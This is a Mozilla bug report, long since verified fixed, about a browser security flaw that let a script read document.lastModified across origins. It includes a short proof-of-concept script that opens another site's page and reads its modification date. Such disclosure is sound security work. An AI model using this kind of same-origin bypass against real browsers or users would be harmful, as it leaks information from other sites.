Closed
Bug 17538
Opened 26 years ago
Closed 26 years ago
document.lastModified is exposed
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
Acess is allowed to document.lastModified, which allows seeing the last
modification date of any document.
The code is:
------------------------------------------
<SCRIPT>
s="http://www.mozilla.org/index.html";
a=window.open(s);
setTimeout("alert('The last modification date of '+s+' is
'+a.document.lastModified);",10000);
</SCRIPT>
------------------------------------------
Assignee | ||
Updated•26 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M14
Assignee | ||
Updated•26 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Comment hidden (collapsed) |
You need to log in
before you can comment on or make changes to this bug.
Description
•